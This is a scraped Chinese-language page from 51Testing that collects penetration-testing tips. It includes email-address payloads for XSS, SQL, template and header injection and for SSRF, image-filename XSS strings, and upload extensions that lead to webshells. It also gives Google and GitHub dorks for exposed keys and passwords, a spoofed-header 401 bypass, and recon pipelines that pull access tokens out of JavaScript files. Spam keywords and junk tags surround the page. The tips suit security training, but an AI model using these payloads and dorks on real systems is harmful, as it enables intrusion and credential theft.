<code id="ebytu"><sup id="ebytu"><track id="ebytu"></track></sup></code>
    <td id="ebytu"><option id="ebytu"></option></td>
    <pre id="ebytu"><label id="ebytu"><menu id="ebytu"></menu></label></pre>
    <acronym id="ebytu"><label id="ebytu"><xmp id="ebytu"></xmp></label></acronym>
  1. <td id="ebytu"></td>

    <track id="ebytu"><ruby id="ebytu"></ruby></track>

            測試技術之滲透測試技巧總結

            發表于:2022-12-15 09:37

            字體: | 上一篇 | 下一篇 | 我要投稿

             作者:知冰    來源:博客園

            分享:
              訪問隱藏的注冊頁面
              滲透測試過程中很多頁面會隱藏注冊,可以嘗試用這些路徑去查找注冊頁面,成功注冊可以訪問后臺或應用頁面去尋找漏洞。
              在Burp Suite過濾垃圾的包
              Burp Suite>Proxy>Options>TLS Pass Through
              highlighter- jboss-cli
              .*\.google\.com
              .*\.gstatic\.com
              .*\.googleapis\.com
              .*\.pki\.goog
              .*\.mozilla\..*
              現在,所有連接到這些主機的底層連接將直接繞過他們,而不通過代理。
              Google dorks語法
              highlighter- vim
              inurl:example.com intitle:"index of"
              inurl:example.com intitle:"index of /" "*key.pem"
              inurl:example.com ext:log
              inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
              inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
              https://www.exploit-db.com/google-hacking-database
              電郵件地址payloads
              下面的payloads都是有效的電子郵件地址,我們可以用來對基于網絡的電子郵件系統進 測試。
              XSS (Cross-Site Scripting):
              highlighter- typescript
              test+(<script>alert(0)</script>)@example.com
              test@example(<script>alert(0)</script>).com
              "<script>alert(0)</script>"@example.com
              模板注 :
              highlighter- elixir
              "<%= 7 * 7 %>"@example.com
              test+(${{7*7}})@example.com
              SQL 注 :
              highlighter- java
              "' OR 1=1 -- '"@example.com
              "mail'); DROP TABLE users;--"@example.com
              SSRF (Server-Side Request Forgery):
              highlighter- stata
              john.doe@abc123.burpcollaborator.net
              john.doe@[127.0.0.1]
              (Email) 頭注 :
              highlighter- perl
              "%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
              "recipient@test.com>\r\nRCPT TO:<victim+"@test.com
              文件上傳漏洞匯總
              以下是上傳的  列表,你可以通過上傳來實現這些類型漏洞。
              ·ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
              · SVG: 存儲 XSS / SSRF / XXE
              · GIF: 存儲 XSS / SSRF
              · CSV: CSV 注 
              · XML: XXE
              · AVI: LFI / SSRF
              · HTML / JS : HTML 注  / XSS / 開放重定向
              · PNG / JPEG: 像素洪 攻擊 (DoS)
              · ZIP: RCE via LFI / DoS
              · PDF / PPTX: SSRF / 盲打 XXE
              查找javascript 件
              gau和httpx
              這里有一個偵察技巧,使  gau 和 httpx實用程序找到我們目標上托管的javascript 件。
              highlighter- vim
              echo target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type
              | grep 'application/javascript'
              這個組合要做的是,它將從AlienVault的Open Threat Exchange(OTX)、Wayback Machine和Common。
              Crawl中收集我們 標的所有已知URL,使 httpx獲取它們,然后只顯示javascript 件。
              為了使這個組合 作,我們必須安裝以下工具:
              https://github.com/projectdiscovery/httpx
              https://github.com/lc/gau
              gau
              1. 收集你的目標的所有鏈接:
              cat hosts | sed 's/https\ :\/\///' | gau > urls.txt
              2. 過濾掉javascript URL:
              cat urls.txt | grep -P "\w+\.js(\ |$)" | sort -u > jsurls.txt
              3. 使用ffuf只獲取有效的鏈接,并將其直接發送到Burp中。:
              ffuf -mc 200 -w jsurls.txt:HFUZZ -u HFUZZ -replay-proxy http://127.0.0.1:8080
              4. 使 Scan Check Builder Burp擴展,添加被動配置 件提取 "accessToken "或 “access_token”。
              5. 在Burp中對這些javascript鏈接運 被動掃描。
              6. 提取發現的令牌,并在報告前對其進 驗證。
              highlighter- coq
              cat hosts | ./gau | cut -d" " -f1 | grep -E "\.js( :onp ) $" | tee urls.txt
              使用httpx和subjs收集JavaScript 件
              highlighter- gherkin
              cat domains | httpx -silent | subjs | anew
              文件上傳擴展名
              · ASP:
              highlighter- asciidoc
              .aspx
              .config
              .ashx
              .asmx
              .aspq
              .axd
              .cshtm
              .cshtml
              .rem
              .soap
              .vbhtm
              .vbhtml
              .asa
              .asp
              .cer
              .shtml
              · PHP:
              highlighter- stylus
              .php
              .php5
              .php3
              .php2
              .shtml
              .html
              .php.png
              (double extension attack)
              401認證繞過
              這是 個有趣的提示,可以幫助你找到認證繞過漏洞。
              Request:
              highlighter- apache
              GET /delete user=test HTTP/1.1
              Response:
              HTTP/1.1 401 Unauthorized
              現在讓我們試試這個。
              highlighter- apache
              Request:
              GET /delete user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1
              Response:
              HTTP/1.1 302 Found
              當前端使 添加的 定義HTTP頭(X-Custom-IP-Authorization)時,這可能會起作 –例如,當它被用來識別通過負載均衡器連接到Web服務器的客戶端的原始IP地址時。
              通過識別  是127.0.0.1,我們可能會規避Web應 程序的訪問控制,并執 特權操作。
              使 GitHub dorks發現secrets
              highlighter- irpf90
              1. “target.com” send_keys
              2. “target.com” password
              3. “target.com” api_key
              4. “target.com” apikey
              5. “target.com” jira_password
              6. “target.com” root_password
              7. “target.com” access_token
              8. “target.com” config
              9. “target.com” client_secret
              10. “target.com” user auth
              驗證:https://github.com/streaak/keyhacks
              圖像XSS
              highlighter- php-template
              <img src=x onerror=alert('XSS')>.png
              "><img src=x onerror=alert('XSS')>.png
              "><svg onmouseover=alert(1)>.svg
              <<script>alert('xss')<!--a-->a.png
              請注意,這可能只在基于UNIX的系統上 作,因為Windows不接受特殊字符作為 件名。然而,作為 種反射的XSS,它應該普遍適用。
              Android應 中打開任意URL
              尋找 種簡單的 法來打開Android應 中的任意URL?
              1. 下載jadx反編譯器并安裝adb。
              2. 打開AndroidManifest.xml
              3. 查找所有瀏覽器活動(必須包含 <category. andoid:name=“android.intent.category.BROWSABLE”/> )。
              為每個活動(或您的任何域)運 " adb shell am start -n app_package_name/component_name -a android.intent.action.view -d google.com "。
              同時在Burp中跟蹤任何對google.com或你的域名的請求。
              4. 如果一個域名被打開,這意味著你發現了 個漏洞! 現在檢查請求是否包含任何auth令牌(如果是,說明你的賬戶被接管了!)。沒有?嘗試不同的技術來獲取任何PII。在最壞的情況下,如果你能在
               個應 程序中打開任意鏈接,你會得到像XSS 樣的獎勵。
              請注意,我們可以使 apktool來代替jadx反編譯器,它有更好的能 從APK中解碼
              AndroidManifest.xml 件。
              如果你使 的是Kali Linux,最簡單的 法就是使 apt.apktool來獲取所有必要的程序。
              highlighter- mipsasm
              apt-get -y install adb jadx apktool
              12款安卓安全測試工具列表:
              這是 個當今最好的Android安全測試 具的集合。
              1、Dex2JAR -  套 于Android Dex和Java CLASS 件的 具。
              2、ByteCodeView - Java & Android APK 逆向 程套件 (反編譯器,編輯器,調試器等)
              3、JADX - Dex轉Java反編譯 具, 于從Android Dex和APK 件 成Java源代碼。
              4、JD-GUI -  個獨 的圖形化 具, 于顯示來 CLASS 件的Java源。
              5、Drozer -  個全 的Android安全測試框架。
              6、Baksmali - Dalvik(Android的Java)使 的Dex格式的匯編器/反匯編器。
              7、AndroGuard -  把 于分析、反編譯和逆轉Android應 程序的瑞 軍 。
              8、ApkTool - 另 個反向 程Android應 程序的瑞 軍  具。
              9、QARK -  于查找多個安全相關的Android應 漏洞的 具。
              10、AndroBugs - 另 個 于識別Android應 程序中安全漏洞的分析 具。
              11、AppMon -  于監控和篡改本地macOS、iOS和Android應 的系統API調 的 動化框架。
              12、MobSF -  個 持Android,iOS和Windows移動應 的 體化 動化移動安全框架。
              真的是 個了不起的 具列表,不僅僅是 于Android應 的反轉!有些擅 靜態分析,有些 于動態分析,有些則是兩者兼 有之,但所有這些 具都是開源且免費使用的。
              其中有些擅長靜態分析,有些 于動態分析,有些則是兩者兼 有之,但所有這些工具都是開源的, 且可以免費使用。
              本文內容不用于商業目的,如涉及知識產權問題,請權利人聯系51Testing小編(021-64471599-8017),我們將立即處理
            價值398元的測試課程免費贈送,填問卷領取吧!

            關注51Testing

            聯系我們

            快捷面板 站點地圖 聯系我們 廣告服務 關于我們 站長統計

            法律顧問:上海漕溪律師事務所 項棋律師
            版權所有 上海博為峰軟件技術股份有限公司 Copyright©51testing.com 2003-2022
            投訴及意見反饋:webmaster@51testing.com; 業務聯系:service@51testing.com 021-64471599-8017

            滬ICP備05003035號

            滬公網安備 31010102002173號

            亚洲春色校园小说_欧洲精品色在线观看视频_国产思思99RE99在线观看_天天躁日日躁狠狠躁日日躁

            <code id="ebytu"><sup id="ebytu"><track id="ebytu"></track></sup></code>
              <td id="ebytu"><option id="ebytu"></option></td>
              <pre id="ebytu"><label id="ebytu"><menu id="ebytu"></menu></label></pre>
              <acronym id="ebytu"><label id="ebytu"><xmp id="ebytu"></xmp></label></acronym>
            1. <td id="ebytu"></td>

              <track id="ebytu"><ruby id="ebytu"></ruby></track>